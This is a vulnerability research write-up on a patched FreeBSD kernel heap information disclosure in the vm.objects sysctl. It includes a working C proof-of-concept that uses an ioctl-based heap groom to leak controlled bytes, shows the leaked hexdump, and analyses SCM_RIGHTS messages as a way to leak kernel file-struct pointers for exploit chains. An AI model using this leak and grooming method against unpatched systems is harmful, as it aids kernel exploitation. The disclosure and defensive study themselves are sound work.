FreeBSD 11.2+ vm.objects sysctl Kernel Heap Information Disclosure
chris
Introduction
FreeBSD 11.2 introduced a kernel heap information disclosure bug through the vm.objects sysctl, caused by missing memory sanitisation. The underlying bug has actually been present since 10.3, but there it existed as a stack information disclosure instead.
While kernel information disclosure bugs aren't terribly interesting by themselves, they can form an important part of an exploit chain: disclosing useful heap addresses is often essential to paving the way to upgrade a restricted memory corruption vulnerability to an arbitrary read/write capability.
This article describes the bug, discusses simple grooming options for leaking potentially useful pointers and provides a proof-of-concept exploit to demonstrate the issue.
The vulnerability was reported to the FreeBSD Security Officer Team on the 4th of December, 2022, and subsequently patched in January after the holiday season had passed. Thanks again to Philip Paeps from the FreeBSD Security Team for a very fast response.
Vulnerability Overview
For the uninitiated, sysctls are something of a second-class syscall interface. They're basically system-wide key/value pairs exposed by the kernel for reading (and sometimes writing) through the sysctl(2) syscall.
The sysctl(2) syscall allows userland to provide three high-level pieces of data:
- The key of the sysctl to query.
- An optional userland pointer and size to fetch the "old" value into.
- An optional userland pointer and size to provide a "new" value.
For a lot of sysctls, since they're system-wide, providing a "new" value requires root privileges. To read a value, userland will typically just provide a pointer/size for the "old" value and leave the "new" pointer/size as NULL/0.
While most sysctls expose simple primitive datatypes, such as strings or integers, some sysctls are more complex and interesting. To serve the more interesting cases, the FreeBSD kernel source provides the SYSCTL_PROC macro, which basically says "declare this sysctl and use that function to handle the request".
The functions that handle the requests sometimes get less attention than traditional syscalls, so they're worth exploring for vulnerabilities.
Here's the vm.objects sysctl definition from the vm/vm_object.c file in the FreeBSD kernel:
    static int
[2] sysctl_vm_object_list(SYSCTL_HANDLER_ARGS)
    {
        return (vm_object_list_handler(req, false));
    }

[1] SYSCTL_PROC(_vm, OID_AUTO, objects, CTLTYPE_STRUCT | CTLFLAG_RW | CTLFLAG_SKIP |
        CTLFLAG_MPSAFE, NULL, 0, sysctl_vm_object_list, "S,kinfo_vmobject",
        "List of VM objects");
We can see the SYSCTL_PROC macro defining the "objects" node of the "vm" root node [1] and referencing the function sysctl_vm_object_list [2] as the handler function.
Notice that the SYSCTL_HANDLER_ARGS macro expands to the standard argument list of a sysctl implementation:
#define SYSCTL_HANDLER_ARGS struct sysctl_oid *oidp, void *arg1, \
        intmax_t arg2, struct sysctl_req *req
Let's see what actually happens in vm_object_list_handler, then:
static int
vm_object_list_handler(struct sysctl_req *req, bool swap_only)
{
    struct kinfo_vmobject *kvo;
    char *fullpath, *freepath;
    struct vnode *vp;
    struct vattr va;
    vm_object_t obj;
    vm_page_t m;
    u_long sp;
    int count, error;

[3] if (req->oldptr == NULL) {
        /*
         * If an old buffer has not been provided, generate an
         * estimate of the space needed for a subsequent call.
         */
        ...
        return (SYSCTL_OUT(req, NULL, sizeof(struct kinfo_vmobject) *
            count * 11 / 10));
    }

[4] kvo = malloc(sizeof(*kvo), M_TEMP, M_WAITOK);
    error = 0;

    /*
     * VM objects are type stable and are never removed from the
     * list once added. This allows us to safely read obj->object_list
     * after reacquiring the VM object lock.
     */
    mtx_lock(&vm_object_list_mtx);
[5] TAILQ_FOREACH(obj, &vm_object_list, object_list) {
        ...
        if (obj->type == OBJT_DEAD ||
            (swap_only && (obj->flags & (OBJ_ANON | OBJ_SWAP)) == 0))
            continue;
        VM_OBJECT_RLOCK(obj);
        if (obj->type == OBJT_DEAD ||
            (swap_only && (obj->flags & (OBJ_ANON | OBJ_SWAP)) == 0)) {
            VM_OBJECT_RUNLOCK(obj);
            continue;
        }
        mtx_unlock(&vm_object_list_mtx);
[6]     kvo->kvo_size = ptoa(obj->size);
        kvo->kvo_resident = obj->resident_page_count;
        kvo->kvo_ref_count = obj->ref_count;
        ...
        /* Pack record size down */
        kvo->kvo_structsize = offsetof(struct kinfo_vmobject, kvo_path)
            + strlen(kvo->kvo_path) + 1;
        kvo->kvo_structsize = roundup(kvo->kvo_structsize,
            sizeof(uint64_t));
[7]     error = SYSCTL_OUT(req, kvo, kvo->kvo_structsize);
        maybe_yield();
        mtx_lock(&vm_object_list_mtx);
        if (error)
            break;
    }
    mtx_unlock(&vm_object_list_mtx);
    free(kvo, M_TEMP);
    return (error);
}
The purpose of this sysctl is to provide a list of information about virtual memory objects to userland. This could be a pretty lengthy list depending on exactly how many objects are visible to the calling process.
If userland called the sysctl with a NULL "old" pointer, the kernel returns an estimate of the buffer size that userland should allocate before calling again [3].
If an "old" pointer/size was provided, then the kernel tries to provide as much of the information as possible. It begins by allocating a single struct kinfo_vmobject that it will populate for each object in turn [4].
Next, it loops through all of the objects on the global vm_object_list [5] and populates that information object with various pieces of information, some of which are shown in the snippet starting at [6], but many are omitted here for brevity.
Once the various fields are set, the kernel copies out the information about this current virtual memory object [7] and continues on to the next one.
The short story of what's happening, then, is that the kernel iterates over all of the registered virtual memory objects and copies out some information object for each to userland.
The object the kernel uses to store this information in is a kinfo_vmobject and is particularly interesting because the call to malloc doesn't pass the M_ZERO flag. That means that the memory will not be zero-initialised by the kernel heap allocator.
If any fields aren't explicitly set by the logic here, those uninitialised bytes will be copied out to userland.
Sure enough, it seems there are plenty of bytes that remain uninitialised:
/*
 * The "vm.objects" sysctl provides a list of all VM objects in the system
 * via an array of these entries.
 */
struct kinfo_vmobject {
    int kvo_structsize;                 /* Variable size of record. */
    int kvo_type;                       /* Object type: KVME_TYPE_*. */
    uint64_t kvo_size;                  /* Object size in pages. */
    uint64_t kvo_vn_fileid;             /* inode number if vnode. */
    uint32_t kvo_vn_fsid_freebsd11;     /* dev_t of vnode location. */
    int kvo_ref_count;                  /* Reference count. */
    int kvo_shadow_count;               /* Shadow count. */
    int kvo_memattr;                    /* Memory attribute. */
    uint64_t kvo_resident;              /* Number of resident pages. */
    uint64_t kvo_active;                /* Number of active pages. */
    uint64_t kvo_inactive;              /* Number of inactive pages. */
    union {
        uint64_t _kvo_vn_fsid;
        uint64_t _kvo_backing_obj;      /* Handle for the backing obj */
    } kvo_type_spec;                    /* Type-specific union */
    uint64_t kvo_me;                    /* Uniq handle for anon obj */
    uint64_t _kvo_qspare[6];
    uint32_t kvo_swapped;               /* Number of swapped pages */
    uint32_t _kvo_ispare[7];
    char kvo_path[PATH_MAX];            /* Pathname, if any. */
};
At first glance, it looks like we've struck info-disclosure gold with the very large kvo_path field at the end (PATH_MAX is 1024), but if we refer back to the copyout logic, the kernel uses the strlen of that field as an upper bound on how much of each record is copied out.
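The "pack record size down" arithmetic can be checked in userland. The following is a minimal sketch, assuming an LP64 target and using a local copy of the struct shown above (named kinfo_vmobject_sketch here, with KVO_PATH_MAX standing in for PATH_MAX, so that it builds outside FreeBSD); kvo_record_size is a hypothetical helper, not a kernel function.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define KVO_PATH_MAX 1024   /* stands in for PATH_MAX, per the text above */

/* Local copy of the struct from the article, for illustration only. */
struct kinfo_vmobject_sketch {
    int kvo_structsize;
    int kvo_type;
    uint64_t kvo_size;
    uint64_t kvo_vn_fileid;
    uint32_t kvo_vn_fsid_freebsd11;
    int kvo_ref_count;
    int kvo_shadow_count;
    int kvo_memattr;
    uint64_t kvo_resident;
    uint64_t kvo_active;
    uint64_t kvo_inactive;
    union {
        uint64_t _kvo_vn_fsid;
        uint64_t _kvo_backing_obj;
    } kvo_type_spec;
    uint64_t kvo_me;
    uint64_t _kvo_qspare[6];
    uint32_t kvo_swapped;
    uint32_t _kvo_ispare[7];
    char kvo_path[KVO_PATH_MAX];
};

/*
 * Bytes copied out for one record: everything up to kvo_path, plus the
 * path and its NUL terminator, rounded up to a multiple of 8.
 */
static size_t
kvo_record_size(const char *path)
{
    size_t sz;

    sz = offsetof(struct kinfo_vmobject_sketch, kvo_path) + strlen(path) + 1;
    return ((sz + sizeof(uint64_t) - 1) / sizeof(uint64_t) * sizeof(uint64_t));
}
```

For an object with an empty path this gives 160 + 0 + 1 = 161, rounded up to 168 bytes (0xa8). So each record still carries the spare fields in full, along with the few bytes of rounding slack after the path's terminator.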
Even so, there are a few "spare" fields that provide more than enough useful bytes to leak.
Exploitability Analysis
Uninitialised kernel heap disclosures aren't useful in every case. The case here is pretty promising, however, because the allocation comes from the general purpose heap (i.e. through malloc) and there are clearly plenty of bytes for us to target with a groom in the _kvo_qspare and _kvo_ispare fields.
So long as we can think of a way to get some useful kernel heap pointers leaked through those fields, this is a useful leak to have.
Before getting to the point of considering useful leaks, however, we should demonstrate the trivial case: leaking a bunch of bytes we can control as a starting point.
The ioctl(2) syscall is a good candidate for this:
int
sys_ioctl(struct thread *td, struct ioctl_args *uap)
{
    u_char smalldata[SYS_IOCTL_SMALL_SIZE] __aligned(SYS_IOCTL_SMALL_ALIGN);
    uint32_t com;
    int arg, error;
    u_int size;
    caddr_t data;
    ...
[1] size = IOCPARM_LEN(com);
    ...
    if (size > 0) {
        if (com & IOC_VOID) {
            ...
        } else {
            if (size > SYS_IOCTL_SMALL_SIZE)
[2]             data = malloc((u_long)size, M_IOCTLOPS, M_WAITOK);
            else
                data = smalldata;
        }
    ...
    if (com & IOC_IN) {
[3]     error = copyin(uap->data, data, (u_int)size);
        ...
    error = kern_ioctl(td, uap->fd, com, data);
    if (error == 0 && (com & IOC_OUT))
        error = copyout(data, uap->data, (u_int)size);
out:
    if (size > SYS_IOCTL_SMALL_SIZE)
[4]     free(data, M_IOCTLOPS);
    return (error);
}
The size of the data from userland is extracted from the ioctl command itself using the IOCPARM_LEN macro [1]. For small sizes, the kernel uses a buffer on the stack, but over a certain limit it allocates a buffer of that size using malloc [2]. This limit is 128 bytes.
With a buffer allocated, it then does a copyin [3], calls down to kern_ioctl and then frees on the exit path [4].
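To make the size encoding concrete, here is a small sketch of how a command word carries its parameter length. The SK_-prefixed macros are local copies that are assumed to mirror FreeBSD's <sys/ioccom.h> (a 13-bit length field starting at bit 16, with direction flags in the top three bits); sk_ioctl_uses_heap is a hypothetical helper that restates the branch at [2].

```c
#include <stdint.h>

/* Assumed to mirror <sys/ioccom.h>; renamed so the sketch builds anywhere. */
#define SK_IOCPARM_SHIFT    13
#define SK_IOCPARM_MASK     ((1u << SK_IOCPARM_SHIFT) - 1)
#define SK_IOCPARM_LEN(x)   (((x) >> 16) & SK_IOCPARM_MASK)
#define SK_IOC_VOID         0x20000000u
#define SK_IOC_OUT          0x40000000u
#define SK_IOC_IN           0x80000000u
#define SK_IOC(inout, group, num, len)                              \
    ((uint32_t)((inout) | (((len) & SK_IOCPARM_MASK) << 16) |      \
    ((group) << 8) | (num)))
#define SK_IOW(g, n, len)   SK_IOC(SK_IOC_IN, (g), (n), (len))

/* The stack/heap threshold quoted in the text. */
#define SK_SMALL_SIZE       128

/* Returns 1 if sys_ioctl, as excerpted above, would malloc for this command. */
static int
sk_ioctl_uses_heap(uint32_t com)
{
    uint32_t size = SK_IOCPARM_LEN(com);

    return (size > 0 && !(com & SK_IOC_VOID) && size > SK_SMALL_SIZE);
}
```

Under these assumptions, a command built with a length of 1184 bytes (the size of struct kinfo_vmobject on 64-bit targets) takes the malloc path and has IOC_IN set, so the copyin runs as well.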
Why is this useful? The FreeBSD kernel heap allocator works in a LIFO fashion: malloc will return the last memory chunk freed (for the same size class). That means that if we try to invoke a spurious ioctl (or an ioctl on a spurious file descriptor), this becomes a simple malloc, copyin, free gadget that we can use to control the uninitialised bytes of the next malloc.
If the next malloc is the one from the vm.objects sysctl then we should see those bytes coming back to us.
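The groom can be modelled in userland with a toy allocator. This is only a sketch of the idea, assuming a single size class backed by a LIFO free list; toy_malloc, toy_free, groom and victim_copyout are hypothetical names, and the real allocator is considerably more involved.

```c
#include <stddef.h>
#include <string.h>

#define CHUNK_SIZE  2048
#define NCHUNKS     4

/* Toy allocator: one size class whose free chunks form a LIFO stack. */
static unsigned char arena[NCHUNKS][CHUNK_SIZE];
static void *free_stack[NCHUNKS];
static int free_top = -1;       /* -1 means "not yet initialised" */

static void *
toy_malloc(void)
{
    int i;

    if (free_top < 0) {
        /* First use: push every chunk onto the free stack. */
        free_top = 0;
        for (i = NCHUNKS - 1; i >= 0; i--)
            free_stack[free_top++] = arena[i];
    }
    if (free_top == 0)
        return (NULL);
    return (free_stack[--free_top]);   /* most recently freed chunk */
}

static void
toy_free(void *p)
{
    free_stack[free_top++] = p;
}

/* The malloc/copyin/free gadget: fill a chunk with our bytes, then free it. */
static void
groom(unsigned char fill)
{
    void *p = toy_malloc();

    if (p == NULL)
        return;
    memset(p, fill, CHUNK_SIZE);
    toy_free(p);
}

/*
 * The buggy pattern: allocate without zeroing, initialise only the first
 * 8 bytes, then copy the whole record out to the caller.
 */
static void
victim_copyout(unsigned char *out, size_t len)
{
    unsigned char *p = toy_malloc();

    if (p == NULL || len > CHUNK_SIZE)
        return;
    memset(p, 0, 8);
    memcpy(out, p, len);
    toy_free(p);
}
```

Calling groom('A') followed by victim_copyout() returns the groomed bytes everywhere except the first eight. The real kernel allocator also keeps per-CPU caches, which is presumably why the final PoC in this article pins both of its processes to the same CPU.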
Here's a simple PoC to test:
#include <err.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/sysctl.h>
#include <sys/user.h>
#include <unistd.h>

static void
hexdump(const void *data, size_t datasz)
{
    const unsigned char *b = data;
    size_t n;

    for (n = 0; n < datasz; ++n) {
        fprintf(stderr, "%02x ", b[n]);
        switch ((n + 1) & 0xf) {
        case 0: fputs("\n", stderr); break;
        case 8: fputs(" ", stderr); break;
        }
    }
    fputs("\n", stderr);
}

/*
 * Groom: the ioctl fails on the bad descriptor, but only after the kernel
 * has malloc'd a buffer, copied our 'A's into it and freed it again.
 */
static void
prep_leak(void)
{
    unsigned char dummy[sizeof(struct kinfo_vmobject)];

    memset(dummy, 'A', sizeof(dummy));
    ioctl(-1, _IOW(0, 0, dummy), dummy);
}

int
main(int argc, char *argv[])
{
    unsigned char buf[sizeof(struct kinfo_vmobject)];
    size_t bufsz = sizeof(buf);

    bzero(buf, sizeof(buf));
    prep_leak();
    /*
     * The return value is deliberately ignored: the buffer is too small
     * for the whole list, so the call is expected to fail with ENOMEM
     * after filling as much of it as fits.
     */
    sysctlbyname("vm.objects", buf, &bufsz, NULL, 0);
    hexdump(buf, bufsz);
    return 0;
}
Trying it out, we can see our controlled data:
$ cc -o vm_objects vm_objects.c && ./vm_objects
a8 00 00 00 01 00 00 00 00 40 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00
00 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
00 41 41 41 41 41 41 41 a8 00 00 00 01 00 00 00
00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 01 00 00 00 00 00 00 00 02 00 00 00
04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 00 41 41 41 41 41 41 41
a8 00 00 00 01 00 00 00 00 40 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00
00 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
00 41 41 41 41 41 41 41 a8 00 00 00 01 00 00 00
00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 01 00 00 00 00 00 00 00 02 00 00 00
04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 00 41 41 41 41 41 41 41
a8 00 00 00 01 00 00 00 00 40 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00
00 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
00 41 41 41 41 41 41 41 a8 00 00 00 01 00 00 00
00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 01 00 00 00 00 00 00 00 02 00 00 00
04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 00 41 41 41 41 41 41 41
a8 00 00 00 01 00 00 00 00 40 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00
00 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
00 41 41 41 41 41 41 41 a8 00 00 00 05 00 00 00
You'll notice a lot of repeated data here. That's because we provided a buffer big enough to fit a whole struct kinfo_vmobject in, but due to the strlen of the path limiting the copyout, each virtual memory object actually only occupies a small amount of the buffer.
The repeating runs of 0x41 bytes are the "spare" fields that we're seeing for each object.
Finding a Leak Target
When in possession of a kernel heap information disclosure bug like this, we need to do a little research to groom the heap in a way that leaks some data we actually care about. Sadly, nobody cares about leaking "AAAA...", so we'll need to think some more.
The first thing we need to understand is which malloc bucket this leak is coming from. The kernel heap allocator coarsely organises its internal allocation buckets by size. To determine which bucket this particular leak is coming from, we need to know the size of the kinfo_vmobject struct:
$ lldb /boot/kernel/kernel
(lldb) target create "/boot/kernel/kernel"
Current executable set to '/boot/kernel/kernel' (aarch64).
(lldb) p sizeof(struct kinfo_vmobject)
(unsigned long) $0 = 1184
And check that against the malloc bucket sizes defined in kern/kern_malloc.c:
struct {
    int kz_size;
    const char *kz_name;
    uma_zone_t kz_zone[MALLOC_DEBUG_MAXZONES];
} kmemzones[] = {
    {16, "malloc-16", },
    {32, "malloc-32", },
    {64, "malloc-64", },
    {128, "malloc-128", },
    {256, "malloc-256", },
    {384, "malloc-384", },
    {512, "malloc-512", },
    {1024, "malloc-1024", },
    {2048, "malloc-2048", },
    {4096, "malloc-4096", },
    {8192, "malloc-8192", },
    {16384, "malloc-16384", },
    {32768, "malloc-32768", },
    {65536, "malloc-65536", },
    {0, NULL},
};
Since the size of the object is 1184 bytes, it's too big to come from the 1024 bucket — it must be from the 2048 bucket.
Whatever we're trying to leak, it has to come from the same bucket and has to contain something useful.
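The bucket lookup is easy to sketch. The helper below is hypothetical (malloc_bucket_for is not a kernel function) and simply assumes that a request is served from the smallest bucket in the table above that can hold it.

```c
#include <stddef.h>

/* Bucket sizes copied from the kmemzones table above. */
static const size_t kz_sizes[] = {
    16, 32, 64, 128, 256, 384, 512, 1024, 2048, 4096,
    8192, 16384, 32768, 65536
};

/* Smallest bucket that fits `size`, or 0 if it exceeds every bucket. */
static size_t
malloc_bucket_for(size_t size)
{
    size_t i;

    for (i = 0; i < sizeof(kz_sizes) / sizeof(kz_sizes[0]); i++) {
        if (size <= kz_sizes[i])
            return (kz_sizes[i]);
    }
    return (0);
}
```

With this model, malloc_bucket_for(1184) yields 2048, and so does any other request between 1025 and 2048 bytes. Those are the allocation sizes a useful leak target has to fall into.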
This is where a hunt for "elastic objects" is pretty handy. Rather than just looking for single structs of the right size that happen to be allocated using malloc, we can look for calls to malloc that have some dynamic element to them.
One such useful elastic object is the allocation done when file descriptors are sent over a UNIX domain socket with the SCM_RIGHTS auxiliary control message ("cmsg").
Leaking File Structs with SCM_RIGHTS
The uipc_send kernel function handles the guts of sending data over a UNIX domain socket:
static int
uipc_send(struct socket *so, int flags, struct mbuf *m, struct sockaddr *nam,
    struct mbuf *control, struct thread *td)
{
    ...
    if (control != NULL &&
[1]     (error = unp_internalize(&control, td, NULL, NULL, NULL)))
        goto release;
If an auxiliary control message was passed to the sendmsg(2) syscall, the kernel calls unp_internalize [1].
Control messages are basically extra bits of information that can be sent with a message. The control messages themselves are just sent in an array, one after another, and each message in that list can have a different "type", length and associated data.
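From userland, attaching a control message looks roughly like the sketch below, which passes a single file descriptor with SCM_RIGHTS and receives it on the other end. send_fd and recv_fd are hypothetical helper names; the calls themselves are the standard sendmsg(2)/recvmsg(2) and CMSG_* interfaces.

```c
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <unistd.h>

/* Control buffer sized for exactly one int, aligned for a cmsghdr. */
union fd_cmsg {
    struct cmsghdr hdr;
    unsigned char buf[CMSG_SPACE(sizeof(int))];
};

/* Send one descriptor plus a single data byte; returns 0 on success. */
static int
send_fd(int sock, int fd)
{
    union fd_cmsg u;
    char byte = 0;
    struct iovec iov = { .iov_base = &byte, .iov_len = 1 };
    struct msghdr msg;
    struct cmsghdr *cm;

    memset(&u, 0, sizeof(u));
    memset(&msg, 0, sizeof(msg));
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = u.buf;
    msg.msg_controllen = sizeof(u.buf);

    cm = CMSG_FIRSTHDR(&msg);
    cm->cmsg_level = SOL_SOCKET;
    cm->cmsg_type = SCM_RIGHTS;
    cm->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(cm), &fd, sizeof(fd));

    return (sendmsg(sock, &msg, 0) == 1 ? 0 : -1);
}

/* Receive one descriptor; returns the new descriptor or -1 on failure. */
static int
recv_fd(int sock)
{
    union fd_cmsg u;
    char byte;
    struct iovec iov = { .iov_base = &byte, .iov_len = 1 };
    struct msghdr msg;
    struct cmsghdr *cm;
    int fd;

    memset(&u, 0, sizeof(u));
    memset(&msg, 0, sizeof(msg));
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = u.buf;
    msg.msg_controllen = sizeof(u.buf);

    if (recvmsg(sock, &msg, 0) != 1)
        return (-1);
    cm = CMSG_FIRSTHDR(&msg);
    if (cm == NULL || cm->cmsg_level != SOL_SOCKET ||
        cm->cmsg_type != SCM_RIGHTS ||
        cm->cmsg_len != CMSG_LEN(sizeof(int)))
        return (-1);
    memcpy(&fd, CMSG_DATA(cm), sizeof(fd));
    return (fd);
}
```

The receiver gets a new descriptor number that refers to the same open file as the sender's, which is why the kernel has to translate integers into file references while the message is in flight.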
For UNIX domain sockets, there are a few different types of extra data that a process can send in this way, but the one we're interested in here is SCM_RIGHTS, which allows a process to send file descriptors to the recipient. It's an interesting and neat feature that we can see unp_internalize handle:
static int
unp_internalize(struct mbuf **controlp, struct thread *td,
    struct mbuf **clast, u_int *space, u_int *mbcnt)
{
    struct mbuf *control, **initial_controlp;
    struct proc *p;
    struct filedesc *fdesc;
    struct bintime *bt;
    struct cmsghdr *cm;
    struct cmsgcred *cmcred;
    struct filedescent *fde, **fdep, *fdev;
    struct file *fp;
    struct timeval *tv;
    struct timespec *ts;
    void *data;
    socklen_t clen, datalen;
    int i, j, error, *fdp, oldfds;
    u_int newlen;

    MPASS((*controlp)->m_next == NULL); /* COMPAT_OLDSOCK may violate */
    UNP_LINK_UNLOCK_ASSERT();

    p = td->td_proc;
    fdesc = p->p_fd;
    error = 0;
    control = *controlp;
    *controlp = NULL;
    initial_controlp = controlp;
[2] for (clen = control->m_len, cm = mtod(control, struct cmsghdr *),
        data = CMSG_DATA(cm);
        clen >= sizeof(*cm) && cm->cmsg_level == SOL_SOCKET &&
        clen >= cm->cmsg_len && cm->cmsg_len >= sizeof(*cm) &&
        (char *)cm + cm->cmsg_len >= (char *)data;
        clen -= min(CMSG_SPACE(datalen), clen),
        cm = (struct cmsghdr *) ((char *)cm + CMSG_SPACE(datalen)),
        data = CMSG_DATA(cm)) {
        ...
        datalen = (char *)cm + cm->cmsg_len - (char *)data;
        switch (cm->cmsg_type) {
        ...
        case SCM_RIGHTS:
[3]         oldfds = datalen / sizeof (int);
            if (oldfds == 0)
                continue;
            /* On some machines sizeof pointer is bigger than
             * sizeof int, so we need to check if data fits into
             * single mbuf. We could allocate several mbufs, and
             * unp_externalize() should even properly handle that.
             * But it is not worth to complicate the code for an
             * insane scenario of passing over 200 file descriptors
             * at once.
             */
            newlen = oldfds * sizeof(fdep[0]);
            if (CMSG_SPACE(newlen) > MCLBYTES) {
                error = EMSGSIZE;
                goto out;
            }
            /*
             * Check that all the FDs passed in refer to legal
             * files. If not, reject the entire operation.
             */
            fdp = data;
            FILEDESC_SLOCK(fdesc);
[4]         for (i = 0; i < oldfds; i++, fdp++) {
                fp = fget_noref(fdesc, *fdp);
                if (fp == NULL) {
                    FILEDESC_SUNLOCK(fdesc);
                    error = EBADF;
                    goto out;
                }
                if (!(fp->f_ops->fo_flags & DFLAG_PASSABLE)) {
                    FILEDESC_SUNLOCK(fdesc);
                    error = EOPNOTSUPP;
                    goto out;
                }
            }

            /*
             * Now replace the integer FDs with pointers to the
             * file structure and capability rights.
             */
[5]         *controlp = sbcreatecontrol(NULL, newlen,
                SCM_RIGHTS, SOL_SOCKET, M_WAITOK);
            fdp = data;
[6]         for (i = 0; i < oldfds; i++, fdp++) {
                if (!fhold(fdesc->fd_ofiles[*fdp].fde_file)) {
                    fdp = data;
                    for (j = 0; j < i; j++, fdp++) {
                        fdrop(fdesc->fd_ofiles[*fdp].
                            fde_file, td);
                    }
                    FILEDESC_SUNLOCK(fdesc);
                    error = EBADF;
                    goto out;
                }
            }
            fdp = data;
            fdep = (struct filedescent **)
                CMSG_DATA(mtod(*controlp, struct cmsghdr *));
[7]         fdev = malloc(sizeof(*fdev) * oldfds, M_FILECAPS,
                M_WAITOK);
[8]         for (i = 0; i < oldfds; i++, fdev++, fdp++) {
                fde = &fdesc->fd_ofiles[*fdp];
                fdep[i] = fdev;
[9]             fdep[i]->fde_file = fde->fde_file;
                filecaps_copy(&fde->fde_caps,
                    &fdep[i]->fde_caps, true);
                unp_internalize_fp(fdep[i]->fde_file);
            }
            FILEDESC_SUNLOCK(fdesc);
            break;
        ...
This code looks long and complex, but we needn't fear it. At the top level, the code loops over the list of cmsgs [2] and switches on the type of each. For a control message of type SCM_RIGHTS, the kernel first determines how many file descriptors follow the cmsg header [3].
Next, it loops over all of the file descriptors making sure that they're able to be sent [4] (some types of file are forbidden from being sent like this) before allocating an mbuf to hold an array of filedescent pointers [5].
mbufs are a unit of heap allocation specific to the networking stack in
FreeBSD. They're backed by their own special zone and arbitrary lengths are
constructed by creating a linked list of mbufs. We can largely ignore them
for the discussion here.
A filedescent is how an open file within a process' file descriptor table is represented. In fact, a numeric file descriptor is literally just an index into a table of these structures:
struct filedescent {
    struct file *fde_file;      /* file structure for open file */
    struct filecaps fde_caps;   /* per-descriptor rights */
    uint8_t fde_flags;          /* per-process open file flags */
    seqc_t fde_seqc;            /* keep file and caps in sync */
};
Each entry points to the file struct that's open and has some other associated fields (e.g. if UF_CLOEXEC has been set for that descriptor).
Remember that at this point the kernel's only allocated an array of pointers to these.
With an array of filedescent pointers allocated, the next step is to walk over the list of file descriptors again and obtain a reference to each [6]. If this fails for any, the whole process is aborted.
Finally, the kernel has determined that the descriptors are sendable and it was able to acquire a reference on each. The last step is to allocate an array to hold the actual filedescent structs [7], then loop over the descriptors one last time [8], setting the filedescent pointers in the mbuf to an element in this new malloc'd array [9].
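Here's a rough picture of how this data will look: the control mbuf holds an array of filedescent pointers, each pointing at one element of the separately malloc'd filedescent array, and each of those elements in turn holds a pointer to the underlying file struct.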
When the UNIX message is received by the recipient process, this process is reversed: the filedescents are pulled out of the control message and inserted into the receiving process' file descriptor table. The array of filedescents that was allocated in unp_internalize is freed once this is done. See unp_externalize if you're interested.
